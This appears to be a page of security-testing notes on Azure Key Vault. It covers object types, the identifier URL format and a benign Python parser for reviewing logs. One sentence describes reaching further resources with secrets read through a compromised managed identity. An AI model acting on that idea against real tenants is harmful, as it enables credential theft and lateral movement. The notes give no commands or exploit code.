Key Vault
Azure service for storing secrets like passwords, connection strings, certificates, private keys etc.
Last updated
If we can compromise an Azure resource whose managed identity can read secrets from a key vault (because of an access policy, one of the built-in roles that grants data-plane read, or a custom role with the equivalent permissions), it may be possible to use those secrets to reach further resources.
Object types available with a key vault:
– Cryptographic Keys
  - RSA, EC etc.
– Secrets
  - Passwords, connection strings
– Certificates
  - Life cycle management
– Storage account keys
  - Key Vault can manage and rotate access keys for storage accounts
Objects in a key vault are identified using an Object Identifier URL, built from these parts:
– vault-name is the globally unique name of the key vault
– object-type can be "keys", "secrets" or "certificates"
– object-name is the unique name of the object within the key vault
– object-version is system generated and optionally used to address a specific version of an object; when it is omitted, the current version is addressed.
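As an added example that is not part of the original notes, the parser below splits a Key Vault object identifier of the form `https://{vault-name}.vault.azure.net/{object-type}/{object-name}[/{object-version}]` into the parts listed above, rejecting unknown object types and treating a missing version as "current version". It assumes the public-cloud DNS suffix `.vault.azure.net` (sovereign clouds use other suffixes); the identifier values in the test are constructed.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# The three object-type path segments a Key Vault object identifier can carry.
VALID_OBJECT_TYPES = {"keys", "secrets", "certificates"}
# Assumption: public Azure cloud; other clouds use a different suffix.
VAULT_DNS_SUFFIX = ".vault.azure.net"


@dataclass(frozen=True)
class KeyVaultObjectId:
    vault_name: str
    object_type: str
    object_name: str
    object_version: Optional[str]  # None means "current version"


def parse_key_vault_object_id(url: str) -> KeyVaultObjectId:
    """Parse https://<vault-name>.vault.azure.net/<type>/<name>[/<version>]."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("Key Vault object identifiers are always https")
    host = parts.hostname or ""  # urlsplit already lower-cases the host
    if not host.endswith(VAULT_DNS_SUFFIX):
        raise ValueError(f"unexpected host {host!r}")
    vault_name = host[: -len(VAULT_DNS_SUFFIX)]
    if not vault_name:
        raise ValueError("missing vault name")
    # Path segments: object-type, object-name and the optional object-version.
    segments = [s for s in parts.path.split("/") if s]
    if len(segments) not in (2, 3):
        raise ValueError(
            f"expected /<object-type>/<object-name>[/<version>], got {parts.path!r}"
        )
    object_type, object_name = segments[0], segments[1]
    if object_type not in VALID_OBJECT_TYPES:
        raise ValueError(f"unknown object type {object_type!r}")
    object_version = segments[2] if len(segments) == 3 else None
    return KeyVaultObjectId(vault_name, object_type, object_name, object_version)


if __name__ == "__main__":
    # Constructed sample identifier, not a real vault.
    print(parse_key_vault_object_id(
        "https://contoso-kv.vault.azure.net/secrets/db-conn/0123abcd"))
```

Parsing identifiers this way is useful when reviewing diagnostic logs, since the vault name and object type tell you which vault and which kind of object an identity touched.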